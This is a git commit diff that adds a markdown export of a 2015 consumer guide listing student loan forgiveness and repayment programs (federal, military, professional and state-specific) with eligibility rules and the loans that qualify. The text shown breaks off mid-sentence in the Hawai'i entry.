commit 82b86331e0b7726abe99c6a38d1f245e341690d2 Author: drjones Date: Tue May 19 19:13:06 2026 -0700 Add markdown exports diff --git a/100-ways-to-get-rid-of-your-loan-2015_pdf.md b/100-ways-to-get-rid-of-your-loan-2015_pdf.md new file mode 100644 index 0000000..df6ec19 --- /dev/null +++ b/100-ways-to-get-rid-of-your-loan-2015_pdf.md @@ -0,0 +1,2310 @@ +# 100-ways-to-get-rid-of-your-loan-2015 + + +--- + +100+ Ways To Get Rid Of Your Student Loans +(Without Paying Them) +An (Almost) Comprehensive Guide To +Student Loan Forgiveness And Discharge +Last updated: June 4, 2015 + +American Student Assistance, SALT, SALT logo, and Money knowledge for college—and beyond are trademarks of American +Student Assistance. +© 2014-2015 American Student Assistance. All rights reserved. + +Contents +Part One: Introduction ................................................................................................................ 5 +Part Two: Loan Forgiveness Options ......................................................................................... 9 +Community Service ...............................................................................................................10 +Military ...................................................................................................................................11 +Profession .............................................................................................................................14 +State Specific ........................................................................................................................23 +Part Three: Loan Discharge Options .........................................................................................69 +Closed Schools/School Error .................................................................................................70 +Disaster .................................................................................................................................71 +Financial Hardship .................................................................................................................71 +Fraud .....................................................................................................................................74 +Medical ..................................................................................................................................75 +Part Four: Other Useful Stuff .....................................................................................................78 +Glossary ................................................................................................................................79 +Links And References ...........................................................................................................80 +About SALT ..............................................................................................................................81 + +Part One: Introduction + +So, What Is This Thing? +In short, this eBook is our latest collection of the different options that may forgive, discharge, or +pay for all or a portion of your federal student loans. For this 2015 edition, we’ve rounded up +more than 100 programs that fall into these categories! +Why We Created This +Quite frankly, because we’re awesome. But really, because we care about your success +managing your student loans. +The amount of options out there is dizzying and confusing, and we think it’s cruel to make you +figure it out all on your own. Also, we haven’t found another resource out there that covers all +the options like this does (and we’d know—we work in student loans). +We figured you might want some help, and you might not like that help to come in the form of a +big, intimidating table or webpage. So we wrote this easy-to-navigate book and did our best to +collect everything in one place. There may be more options out there, and some of the ones +here may change, so it’s always good to do your own research too. Still, we hope you think this +resource is a helpful jumping-off point. +Ground Rules: What Are Forgiveness And Discharge? +Student loan forgiveness and discharge are programs instituted by the federal government (as +well as some state governments, organizations, and businesses) that eliminate all or part of a +student’s loans if he or she qualifies. These options exist to help borrowers shoulder the burden +of student debt if they give back to their community, work in fields or areas of need, or face +unpredicted, extenuating circumstances. +The difference between loan forgiveness and discharge is the circumstances that can cancel +the debt. Loan discharges usually occur if there is no way the borrower can pay a loan (e.g., a +total and permanent disability or death) or if a borrower can no longer apply the education for +which the loan was granted (e.g., the school the borrower was attending closed before they +could finish their program). +Loan forgiveness happens when the forgiving party (e.g., the government) determines that the +borrower has given back to the community in a way they’ve specified, like through teaching or +public service. Special repayment programs can act as a form of forgiveness as well. Federal +and state governments, as well as organizations, offer these programs to promote service in +needed fields or high-need areas. +Covering Your Bases +Though forgiveness is a huge opportunity for any do-gooders out there, planning a career and +loan payments around it may not be the best idea. Regulations change, you may not meet all +the requirements, or forgiveness could take longer than you think. Make sure to prepare for +these possibilities—and have a backup plan. + +You should never take on student loan debt assuming that you will be able to forgive all or part +of it down the road. Always borrow the bare minimum you need, and think of any potential +forgiveness benefits as a (very) happy bonus. +Also, know that the IRS considers many student loan forgiveness options to be taxable—so if +you do have some or all of your loans forgiven, the forgiven amount may end up affecting your +tax bill at the end of the year. To determine if forgiveness is taxable, the IRS will generally look +at whether the forgiveness occurred due to the borrower fulfilling a service requirement. If you +are fulfilling a service requirement to receive forgiveness, then the IRS will generally not tax the +amount. However, you should consult a tax professional to determine whether the forgiveness +you receive is taxable. +You can read more about this at www.irs.gov. +Applying For Forgiveness +To apply for forgiveness, you may need proof that you worked for the required number of years +at the location or in the profession that makes you eligible for forgiveness. +We linked all of the forms for the listed forgiveness options, but a simple Google search may +allow you to find other possibilities as well. Be wary of scams and the fine print before filing for +anything. You shouldn’t have to pay to apply for forgiveness or discharge. +Using This Book +We designed this eBook to help you discover, access, and learn more about what options for +forgiveness are available to you. We highlighted eligibility criteria, qualifying loans, and the +steps for pursuing an option—including links to the forms you need to apply. There’s also a +glossary at the end of the book if you need to know the difference between loan types or +repayment options. +A few quick notes: + This book is not all-inclusive by any means. Many employers offer student loan +repayment benefits, and there may be other forgiveness programs that we haven’t +found. It’s also not a magic wand—you can’t wave it in front of your loans to make them +disappear (sorry). The programs we highlight are real, but they’re not immediate. + You may not find a program you’re eligible for in here. If that’s the case, it never hurts to +ask around at your place of employment, city, state, or even any social clubs or sports +teams you may participate in to see if they offer some kind of loan repayment benefit— +you never know! + We’ve updated this book as of the date on the cover, but unfortunately, sometimes +programs like these can change or get phased out. Be sure to check the sites we’ve +linked to for up-to-date information. + Also, be sure to visit the sites we’ve linked to for complete eligibility requirements. These +programs have lots of ins and outs (you didn’t think getting rid of your loans would be +easy, right?), so we only included the highlights. + +OK, that’s it: Now, it’s time to dig in and see how you might be able to get rid of your loans +without paying them! +If you like this book and want to learn more about managing your student loans, check us out at +saltmoney.org. + +Part Two: Loan Forgiveness Options + +Community Service +The community service forgiveness plan listed here is for AmeriCorps members only. There are, +however, other forgiveness plans available if you are active in community service. As always, +funding and requirements are subject to change. +Segal AmeriCorps Education Award +To Be Eligible … +This award is for borrowers who have successfully completed a term of national service in an +approved AmeriCorps program (AmeriCorps VISTA, AmeriCorps NCCC, or AmeriCorps State +and National). You must sign up to receive this award prior to serving with AmeriCorps, and it is +awarded upon successful completion of service. You can use this award up to 7 years after +completing your term of service. +If you meet the requirements for this award, you may receive up to the maximum Pell grant +allotment for the current year for up to 2 to 5 years, depending on which AmeriCorps program +you serve in. For fiscal year 2015, this amount is $5,730. +Please note: Unlike many other community service forgiveness awards, funds from the Segal +AmeriCorps Education Award are taxable. +Loans That Qualify + Stafford loans + Consolidation loans + Parent loans + Grad PLUS loans + Perkins loans + State-funded loans + Health Education Assistance Loans (HEAL) + Nursing Student Loans (NSL) + Primary Care Loans (PCL) + Supplemental Loans for Students (SLS) +These loans may be eligible even if they are in default. +Next Steps +If you have questions regarding this scholarship, check out the AmeriCorps website. + +SponsorChange.org +To Be Eligible … +You must have graduated from college with student loan debt. This program allows borrowers to +volunteer at participating nonprofits in need of manpower and, in return, have their student loan +debt paid down by sponsors who have also signed up with SponsorChange.org. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + State loans + Institutional loans + Private student loans +Next Steps +Visit SponsorChange.org for more information. +Military +All of the following forgiveness plans require you to be a member of the U.S. military. This is not +an exhaustive list. The funding and requirements for each program are subject to change. +Additional qualifications are presented throughout. +Active Duty Health Professions Loan Repayment Program +To Be Eligible … +You must be a fully qualified health professional as determined by a U.S. military branch in an +identified skill shortage area. You must also be serving as a commissioned officer who is +serving on active duty. +Those who qualify for this program are eligible to have up to: + $40,000 per year for up to 3 years forgiven if you are in the dental, medical, allied health, +nurse, or veterinary corps serving active duty. + $50,000 over 3 years forgiven if you are in the dental, medical, allied health, nurse, or +veterinary corps serving in the reserves. +Loans That Qualify + Stafford loans + Grad PLUS loans + + Consolidation loans + Perkins loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +Click the name of this benefit in the title above to access the program’s webpage, and select +“locate a recruiter” or “request more info” to learn how to apply. +Air Force College Loan Repayment Program +To Be Eligible… +This program is for all newly enlisted servicemembers. You must sign up for the program when +enlisting to receive up to 33 1/3% of your student loan balance each year for a total of 3 years +($10,000 maximum). +Loans That Qualify + Stafford loans + Consolidation loans + Parent PLUS loans + Grad PLUS loans + Perkins loans + Auxiliary Loan Assistance for Students (ALAS) + Federally Insured Student Loans (FISL) +Next Steps +Contact an Air Force adviser or recruiter to learn more. +Army College Loan Repayment Program +To Be Eligible … +You must have been in active duty from December 1, 1980, through September 30, 1981, or +after September 30, 1982. You must be a non-prior service accession and enlist with a high +school diploma. And you must have an Armed Forces Qualification Test score of 50 or higher +and enlist in a critical military occupational specialty (MOS); these specialties change quarterly. +A local recruiter will have the current list. +If you meet the requirements, you can receive 33 1/3% or $1,500 (whichever is greater) toward +the remaining original unpaid principal on all qualifying loans for each successfully completed +year of enlisted active duty, up to a total of $65,000. Accrued interest is not eligible for +repayment. + +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans + Perkins loans + Supplemental Loans for Students (SLS) +Next Steps +To apply for this forgiveness plan, contact an army recruiter. +National Guard Student Loan Repayment +To Be Eligible … +You must enlist for a minimum of 6 years for a critical skills vacancy in the grade of E-4 or below +into a qualifying position in a Modified Table of Organization and Equity (MTOE) or Medical +Table of Distribution Allowances (TDA) unit only. You must score a minimum of 50 on the +Armed Forces Qualification Test (AFQT). +Those eligible for this forgiveness can receive up to $7,500 annually, with a maximum of +$50,000. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You must speak to a recruiter to apply for this forgiveness plan. +Navy Loan Repayment Program +To Be Eligible … +This plan is for active-duty borrowers. You must have no prior military experience and enlist for +a minimum of 3 years. If you meet requirements, you are eligible to receive 33 1/3% of the +remaining principal balance or $1,500 (whichever is greater) per year, with a maximum of +$65,000. +Loans That Qualify + + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +More information on this and other Navy college and tuition programs is available here. +Profession +Qualifications for the following forgiveness programs are based on your career. Not all careers +are eligible for forgiveness programs, and this list is not all-inclusive. The funding and +requirements for each program are subject to change. You may find more career-based +forgiveness programs with an online search or by talking to your employer. +Attorney Student Loan Repayment Program +To Be Eligible … +Any U.S. Department of Justice employee serving in or hired to serve in an attorney position +may be considered for this repayment program. If selected, the individual must complete a 3- +year service obligation. +Loans That Qualify + Stafford loans + Supplemental Loans for Students (SLS) + Grad PLUS loans + Federal Consolidation loans + Defense loans made before July 1, 1972 + National Direct Student loans made between July 1, 1972 and July 1, 1987 + Perkins loans + Nursing Student Loans (NSL) + Health Profession Student Loan (HPSL) + Health Education Assistance Loans (HEAL) +Next Steps +The application is available at the link above. +Faculty Loan Repayment Program (FLRP) + +To Be Eligible … +You must be a U.S. citizen or a lawful permanent resident. This repayment program is available +to degree-trained health professionals from disadvantaged backgrounds serving on the faculty +at accredited health profession colleges and universities. +This form of forgiveness will forgive up to $40,000 for 2 years of service. The program also +provides funds to offset the tax burden associated with the forgiveness. Applicants will be +funded first if they obtain a written agreement from the eligible health profession school stating +that the school will match equal FLRP loan repayments. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + State or local government education loans +Next Steps +The 2015-2016 application will be available in May 2015. You can sign up to be notified of this +by email. +Indian Health Services Loan Repayment Program +To Be Eligible … +You must commit to a 2-year service obligation to practice in certain health professions full time +at an Indian health program site. The site must provide quality health care services to American +Indian and Alaska Native communities. +Eligible applicants to this forgiveness plan can receive up to $20,000 per year for an initial 2 +years, and additional years may be added for continued service. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans (only loans included that were borrowed for your health professions +degree are eligible) + Private student loans + Institutional loans + Perkins loans + +You must have borrowed the loans to pay for health profession schools and related expenses, +as well as undergraduate prerequisites that were required for the graduate degree. +Next Steps +Find more information on how to apply for this repayment program here. +John R. Justice Student Loan Repayment Program +To Be Eligible … +You must be an attorney continually licensed to practice law and be at least one of the following: + A prosecutor employed full time by a state or unit of local government (including tribal +government) who prosecutes criminal or juvenile delinquency cases at the state or unit +of local government level. (Prosecutors who are employees of the federal government +are not eligible.) + A public defender who is either a full-time employee of a state or unit of local +government (including tribal government) or a full-time employee of a nonprofit +organization operating under a contract with a state or unit of local government who +provides legal representation to indigent persons in criminal or juvenile delinquency +cases. + A full-time federal defender attorney in a defender organization providing legal +representation to indigent persons in criminal or juvenile delinquency cases pursuant to +Subsection (g) of section 3006A of Title 18, United States Code. + An attorney providing supervision, education, or training of other persons providing +prosecutor or public defender representation. +Awards are dependent upon which state you reside and practice in, as well as the state’s +funding allocation each year. +Loans That Qualify + Stafford loans + Grad PLUS loans + Federal consolidation loans +Next Steps +Contact your state’s designated agency to apply. +National Health Service Corps +To Be Eligible … +This forgiveness plan is available to licensed primary care medical, dental, and mental and +behavioral health providers who are working at high-need sites. +If you qualify, you could receive up to $50,000 for an initial 2-year commitment. Eligibility for +additional repayment is given by applying for additional years. + +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Next Steps +Learn more about the application process for this forgiveness program here. +National Institutes Of Health (NIH) Loan Forgiveness +To Be Eligible … +You must be a U.S. citizen, U.S. national, or U.S. permanent resident. You must also have a +health professional doctoral degree, have qualified educational debt in excess of 20% of +institutional base salary at the time of the award, and perform research that is supported by a +domestic nonprofit foundation, university, professional association, U.S. government agency, or +other nonprofit. +You must engage in qualified research that represents 50% of your level of effort and consumes +an average of at least 20 hours per week during each quarterly service period during the +contract. You must also conduct research that is not prohibited by federal law, regulations, or +policies of the U.S. Department of Health and Human Sciences or NIH. Part-time federal +employees working fewer than 20 hours per week who meet other criteria may apply. +Eligible applicants can receive up to $35,000 per year +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + State-issued loans (includes Washington, D.C., Puerto Rico, and any U.S. held territory) + Academic institution loans + MEDLOANS + Private student loans +Spousal consolidation loans cannot be included + +Next Steps +If you think you’re eligible, you can apply to this program here. +NURSE Corps Loan Repayment Program +To Be Eligible … +This program is for registered nurses and advanced-practice registered nurses working in a +critical shortage facility or nurse faculty in return for working full time at an accredited school of +nursing. +Eligible applicants can receive up to 60% of their loans paid for them for a 2-year service +agreement and up to 85% for service of 3 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + Supplemental Loans for Students (SLS) + Nursing Student Loans (NSL) +You must have obtained your loans to cover nursing educational expenses or living expenses +while studying nursing. Non-nursing education expenses are ineligible. +Next Steps +Borrowers can apply for this program here. +Perkins Loan Cancellation And Discharge +To Be Eligible … +Perkins loans have unique requirements for loan cancellation based on the field you work in. +Schools award these federal, low-interest loans to high-need students attending or planning to +attend college. Approximately 1,700 participating schools offer Perkins loans. +Depending on their profession (see list below), Perkins loan borrowers can have up to 100% of +their loan cancelled over the course of 5 years (except when indicated). Here’s how it works: + 15% of their principal balance and accrued interest can be cancelled after their first and +second year of qualifying service. + 20% of their principal balance and accrued interest can be cancelled after their third and +fourth year. + + 30% of their principal balance and accrued interest can be cancelled after their +fifth year. +Perkins loans also offer concurrent deferment if you are performing qualifying service. +Combining that postponement with these cancellation options means you could potentially +never have to make payments on these loans. +The professions eligible for cancellation and the requirements are listed below. + Attorney: You must be a full-time attorney employed in a federal public or community +defender organization. You must perform qualified service that includes August 14, +2008, or began on or after that date. You may receive up to 100% forgiveness of your +loans. + Child or family services agency: You must be a full-time employee of a public or +nonprofit child or family services agency providing services to high-risk children and their +families from low-income communities. You may receive up to 100% forgiveness of your +loans. + Firefighter: You must be a full-time firefighter whose service included August 14, 2008, +or began on or after that date. Firefighters may receive up to 100% forgiveness of their +loans. + Head Start: You must be a full-time staff member in the education component of a Head +Start program. You may receive up to 100% forgiveness of your loans—15% of the +principal balance and accrued interest for each year of service. + Imminent danger area: You must serve in the U.S. Armed Forces in a hostile fire or +imminent danger area. You may receive forgiveness for up to 50% of your outstanding +loans if your active duty ended before August 14, 2008. You may receive up to 100% +forgiveness of your outstanding loans if your active duty includes or began after August +14, 2008. + Intervention services provider: You must be a full-time qualified professional provider +of early intervention services for the disabled. Service must include August 14, 2008, or +have begun on or after that date. You may receive up to 100% forgiveness of your loans. + Law enforcement: You must be a full-time law enforcement or corrections officer. You +may receive up to 100% forgiveness for your loans. + Librarian: You must be a librarian with a master’s degree working in a Title I-eligible +elementary or secondary school or in a public library serving Title I-eligible schools. +Work must include August 14, 2008, or have begun on or after that date. You may +receive up to 100% forgiveness of your loans. + Nurse or medical technician: You must be a full-time nurse or medical technician. You +may receive up to 100% forgiveness of your outstanding loans. + Prekindergarten or child care: You must be a full-time staff member in a +prekindergarten or child care program that is licensed or regulated by a state. Work must +include August 14, 2008, or have begun on or after that date. You may receive up to +100% forgiveness of your loans. + + Special education teacher: You must be a full-time special education teacher of +children with disabilities in a public school, nonprofit elementary or secondary school, or +educational service agency. If the service is at an educational service agency, it must +include August 14, 2008, or have begun on or after that date. You may receive up to +100% forgiveness of your loans. + Speech pathologist: You must be a full-time speech pathologist with a master’s degree +working in a Title I-eligible elementary or secondary school. Your service must include +August 14, 2008, or have begun on or after that date. You may receive up to 100% +forgiveness of your loans. + Teacher at an educational service agency: You must be a full-time teacher in a +designated educational service agency that serves students from low-income families. +Your service must include August 14, 2008, or have begun on or after that date. You +may receive up to 100% forgiveness of your loans. + Teacher in shortage area field: You must be a full-time teacher of math, science, +foreign languages, bilingual education, or other fields designated as teacher shortage +areas. You may receive up to 100% forgiveness of your loans. + Tribal college faculty member: You must be a full-time faculty member at a tribal +college or university. Your service must include August 14, 2008, or have begun on or +after that date. You may receive up to 100% forgiveness. + VISTA or Peace Corps volunteer: You must serve for a period of time in the +AmeriCorps VISTA program or the Peace Corps. You may receive forgiveness for up to +70% of your loans over the course of 4 years—15% of the principal balance and accrued +interest for the first and second years and 20% of the principal balance and accrued +interest for the third and fourth years. +Loans That Qualify + Perkins loans +Next Steps +To apply, contact your loan holder—which may be the school that you attended. +Public Service Loan Forgiveness +To Be Eligible … +You must make 120 qualifying payments under the standard, income-based, income-contingent, +or Pay As You Earn repayment plan. (Payments made before October 1, 2007, and payments +made while in default do not count.) You must have been working full time at a public service or +nonprofit organization when you made these payments. +Eligible borrowers may receive up to 100% of the remaining outstanding balance after 10 years +and 120 eligible payments. +Loans That Qualify + Direct Stafford loans + + Direct Parent and Grad PLUS loans + Direct Consolidation loans +Parent PLUS loans are only eligible if you consolidate them into a Direct Consolidation loan and +repay them under the standard or income-contingent repayment plan. +You can consolidate any non-Direct loans into Direct loans; however, the payments you made +on the underlying loans do not qualify. +Next Steps +The form to apply for this forgiveness plan is available here. +SEMA Loan Forgiveness Program +To Be Eligible… +This program helps recent graduates in the automotive aftermarket industry get off to a +successful start. You must work for an employer that is part of the Specialty Equipment Market +Association (SEMA) and: + Be a U.S. citizen. + Have completed a graduate, bachelor’s, associate’s, or certificate program. + Achieved at least a 2.5 GPA. + Have at least $2,000 in outstanding student loan debt. + Be employed for at least 1 full year prior to applying. +Loans That Qualify + Stafford loans + Consolidation loans + Parent loans + Grad PLUS loans + Perkins loans +If selected for the award, you will receive $2,000 toward outstanding student loans mailed +directly to your lender. Previous recipients of SEMA Loan Forgiveness are not eligible to +reapply. +Next Steps +You can apply online here. +Teacher Loan Forgiveness Program +To Be Eligible … + +You must teach full time for 5 consecutive years in a designated elementary or secondary +school or educational service agency serving low-income families. Other requirements are listed +in the link above. +Borrowers are eligible to receive up to $5,000 a year or up to $17,500, depending on when the +service began and what subject they teach. +Loans That Qualify + Stafford loans + Consolidation loans +For Consolidation loans, only the portion consolidated you used to repay eligible loans qualifies. +Loans made before October 1, 1998, do not qualify. +Next Steps +You can find the application for this forgiveness program here. +USDA Veterinary Medicine Loan Repayment Program (VMLRP) +To Be Eligible … +You must be a qualified veterinarian serving in certain high-priority veterinary shortage +situations for an agreed amount of time. +Those who are eligible may receive up to $25,000 per year for at least a 3-year commitment. +You may be eligible for additional years of repayment with longer commitments. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Consolidation loans that include loans in another person’s name (such as spousal consolidation +loans) are not eligible. +Next Steps +You can learn more about applying by emailing mvmlrp@nifa.usda.gov. + +State Specific +These forgiveness plans are state specific. You may be eligible in a particular state if you are a +legal resident in that state, work in that state in one of the selected jobs, have a license for one +of the jobs in that state, or went to school in that state. +This list is not all-inclusive. Funding and regulations are subject to change. You may find more +career-based forgiveness programs with an online search. +Alaska Supporting Health Care Access Through Loan Repayment +To Be Eligible … +You must be a licensed health care professional practicing in a federally designated health +professional shortage area in Alaska. You must also sign a 2-year commitment to practice in +that area. +Eligible applicants may receive up to $35,000 per year for 2 years; this amount depends on your +field. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Next Steps +You can find application information here. +Arizona Early Childhood Therapist Incentives Program (AzEIP) +To Be Eligible … +You must be a speech/language pathologist, occupational and physical therapist, child +psychologist, or a mental health specialist who provides early childhood development services +to children from birth through age 5 in specified areas of Arizona. +Loan repayment amounts range from $15,000 to $25,000 depending upon the type of therapy +discipline you work in. In addition, stipend amounts up to $19,000 are available. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + + Consolidation loans +Next Steps +Contact AzEIP directly for specific details and information about applying. +Arizona Loan Repayment Program +To Be Eligible … +You must be an allopathic (MD) or osteopathic (DO) physician in the field of family practice, +pediatrics, obstetrics, or internal medicine, or a dentist, nurse practitioner, certified nurse +midwife, or physician assistant who provides primary care services in Arizona at an eligible +facility. There are three priority levels for this award, which are based on the ranking of the site +where you work (rural, non-rural, degree of shortage, population-to-primary-care-provider ratio, +percentage of minority population, and distance from the nearest provider). +Physicians and dentists may receive loan forgiveness of up to: +Contract Year First Priority Second Priority Third Priority +Initial 2 years $40,000 $36,000 $32,000 +Year 3 $22,000 $20,000 $18,000 +Year 4 $25,000 $22,000 $20,000 +Physician assistants, nurse practitioners, and certified nurse midwives may receive loan +forgiveness of up to: +Contract Year First Priority Second Priority Third Priority +Initial 2 years $15,000 $12,000 $10,000 +Year 3 $9,000 $7,500 $6,500 +Year 4 $10,500 $9,000 $8,000 +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans that include only qualifying loans (Consolidation loans that include +non-qualifying loans are not eligible) + Private student loans + Institutional loans + +Note that service under the National Health Service Corps Scholarship Program, Armed Forces +Health Profession Program, Indian Health Services Scholarship Program, and the Arizona +Medical Student Loan Program do not qualify. +Next Steps +Check here to learn how to apply. +Joyce Holsey’s Arizona’s Legal Legacy (ALL) Loan Repayment Assistance Program +To Be Eligible … +You must be a law school graduate in Arizona employed as a legal aid attorney in one of the +Foundation’s approved nonprofit organizations. You do not need to be a graduate of an Arizona +law school, but you must have an annual income of $65,000 or less, which includes spousal +support. +Attorneys from government agencies are not eligible. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private loans + State loans + Institutional loans +Next Steps +You can find application information at the site listed above. +Arkansas Community Match Rural Physician Recruitment Program +To Be Eligible … +You must be a physician who is either in a residency or no more than 2 years out of residency +serving in a rural community in Arkansas. You must agree to practice primary care in the +community for 4 years. +The community would pay the physician $10,000 per year and the state would pay $10,000 per +year for a total of $80,000 over the course of the 4-year commitment. + +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans +Next Steps +You can access the application at the link above during the application period each year—which +ends in February. Both the community and the physician need to apply. +Arkansas State Teacher Education Program (STEP) +To Be Eligible … +You must be an Arkansas resident for at least 12 months prior to application and: + Have graduated from a teacher education program after April 2004. + Have a valid Arkansas teacher’s license. + Teach full time at a public school in Arkansas. + Teach in a subject area with a teacher shortage, or teach in a geographic area with a +teacher shortage. +You may receive up to $4,000 per year toward your federal student loans for no more than 3 +years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Federal Consolidation loans +Next Steps +Contact the Arkansas Department of Higher Education for further application information. +Bachelor Of Science Nursing Loan Repayment Program (California) +To Be Eligible … + +You must be a licensed registered nurse in California with a BSN degree who is providing direct +patient care in a medically underserved area, Health Professional Shortage Areas (HPSA), or a +county, state, prison, or veterans’ facility. You will need to commit to providing this service for 2 +years to receive up to $8,000 in loan repayment. You may receive this award more than once +and may receive up to $11,000 for the second award. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans +Next Steps +You will need to submit an application to CalREACH. +California Army/Air National Guard Student Loan Repayment Program +To Be Eligible … +You must be a prior or non-prior service soldier in the California Army/Air National Guard or +soldiers reenlisting or extending their service. You will need to sign up for a minimum 6-year +service agreement. +Those who are eligible may receive $7,500 per year with a lifetime maximum of $50,000 to +repay your federal student loans. +Loans That Qualify + Stafford loans + Grad PLUS loans + Parent PLUS loans + Federal Consolidation loans + Perkins loans +To qualify, your loans must have been disbursed prior to your enlistment or reenlistment date. +Next Steps +You may apply here. +California State Loan Repayment Program (SLRP) +To Be Eligible … + +You must be a U.S. citizen or eligible non-citizen, a California resident, and a licensed primary +health care professional who provides health care services in federally designated professional +shortage areas to improve access to health care in underserved areas in California. You must +provide full-time (40 hours per week) primary care in California for a minimum of 2 years. +Private practices do not qualify. Interest that has accrued on your eligible loans is not eligible for +forgiveness. +Eligible borrowers can receive up to $150,000. They may receive $50,000 a year for a 2-year +commitment, $30,000 a year for a 3- or 4-year commitment, and $20,000 a year for a 5- or 6- +year commitment. +Interest that has accrued on your eligible loans is not eligible for forgiveness. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + State loans + Private student loans +Next Steps +You can find more details on eligibility and the application form here. +CDA Foundation Student Loan Repayment Grant +To Be Eligible … +You must graduate from an American Dental Association-accredited dental school within 3 +years of your application or intend to graduate within 3 months of application. You must also: + Be eligible to practice dentistry in California. + Be a legal citizen of the United States. + Agree to serve a minimum of 36 months. + Work full time for an eligible work site. +If eligible, you may receive up to $35,000 per year for up to 3 years of $105,000 total. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + + Consolidation loans + Private student loans + Institutional loans + State loans +Next Steps +Contact the CDA Foundation for more information. +Health Professions Loan Repayment Program (California) +To Be Eligible … +You must provide full-time, direct patient care for 2 years in a California medically underserved +area, Health Professional Shortage Areas (HPSA), or a county, state, prison, or veterans’ +facility. You must be licensed and practicing as a: + Dentist + Dental hygienist + Nurse practitioner + Certified nurse midwife + Physician assistant + Clinical nurse specialist +You may receive up to $50,000 in loan repayment for a 2-year service obligation. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans +Next Steps +You will need to submit an application to CalREACH. +Mental Health Loan Assumption Program (California) +To Be Eligible … +You may receive up to $10,000 toward repaying educational loans in exchange for a 12-month +service obligation in a hard-to-fill or retain position within the County Public Mental Health + +System. Eligible professions in California are determined by county and may include the +following: + Registered or licensed psychologists + Registered or licensed psychiatrists + Postdoctoral psychological assistants + Postdoctoral psychological trainees + Registered or licensed marriage and family therapists + Registered or licensed clinical social workers + Licensed professional clinical counselors + Licensed professional clinical counselor interns + Registered or licensed psychiatric mental health nurse practitioners. +Support, managerial, and/or fiscal staff may be eligible. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans +Next Steps +Submit an application to CalREACH. +Steven M. Thompson Physician Corps Loan Repayment (California) +To Be Eligible … +You must be a licensed allopathic or osteopathic physician in California who commits to +providing full-time, direct patient care in a health profession shortage area in California for 3 +years. +You may receive up to $105,000 for your 3 years of service to repay your eligible student loans. +Loans That Qualify + Stafford loans + Grad PLUS loans + + Consolidation loans + Perkins loans + State loans + Health Professions Student Loans (HPSL) + Private student loans +Next Steps +Submit an application to CalREACH. +Colorado Health Service Corps +To Be Eligible … +You must be a U.S. citizen or eligible non-citizen, a Colorado resident, and a licensed health +care professional who provides health care services for those in need as determined by this +criteria. +Eligible borrowers can receive up to $90,000 per year for up to 3 years, depending on their field +of practice. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans + State loans +Next Steps +You can find the application form for this repayment program here. +DC Health Professional Loan Repayment Program +To Be Eligible … +You must commit to a 2- to 4-year service obligation at an eligible site in Washington, D.C. as a +licensed and certified: + Physician + Dentist + + Dental hygienist + Registered nurse + Advanced practice nurse + Physician assistant + Clinical social worker + Clinical psychologist + Professional counselor +Physicians and dentists may receive up to $143,137 over 4 years, and other eligible providers +may receive up to $78,724. The repayment covers 18% of the debt in year 1, 26% in year 2, +and 28% in years 3 and 4. +Loans That Qualify + Stafford loans + Grad PLUS loans + Perkins loans + Consolidation loans + Private student loans + State loans +Next Steps +Use the link above to find more information about the application process. +Delaware State Loan Repayment Program (DSLRP) +To Be Eligible … +You must work as a designated health care professional in an area of Delaware that the +Delaware Health Commission designates as underserved. DSLRP requires you to sign a +contract for a term of 2 to 3 years of service. +Advanced degree practitioners may receive up to $105,000 for a 3-year commitment. Mid-level +degree practitioners may receive up to $52,500 for a 3-year commitment. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation Loans + + Perkins loans + Private student loans + State loans +Next Steps +You can find the application for this program here. +Nursing Student Loan Forgiveness Program (Florida) +To Be Eligible … +This forgiveness plan is for licensed practical nurses, registered nurses, and advanced +registered nurse practitioners in the state of Florida. You must work at state-of-Florida-operated +medical and health care facilities, public schools, Department of Health, county health +departments, federally sponsored community health centers, teaching hospitals, family practice +teaching hospitals, or specialty hospitals for children. Other Florida-licensed hospitals, birth +centers, and nursing homes must be matched on a dollar-for-dollar basis by contributions from +the employing institutions. +Eligible borrowers can receive up to $4,000/year for a maximum of 4 years. +Loans That Qualify + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Only loans obtained to cover nursing educational expenses or living expenses while studying +nursing are eligible. +Next Steps +You can find the application for this program here. +Georgia Physicians For Rural Areas Assistance Program +To Be Eligible … +You must commit to practice medicine for a minimum of 40 clinical hours per week in a rural +county in Georgia. You must participate in the Medicaid program and actively treat Medicaid +recipients. +If you’re eligible, you can receive up to $25,000 per year for up to 4 years. +Loans That Qualify + + Stafford loans + Grad PLUS loans + Consolidation loans + Perkins loans + Private student loans +Next Steps +You can apply for this forgiveness program here. +Hawai’i State Loan Repayment Program +To Be Eligible … +You must be a healthcare professional (physician, physician assistant, nurse practitioner, +certified nurse midwife, health service psychologist, licensed clinical social worker, licensed +professional counselor, or marriage and family therapist) who commits to serving for at least 2 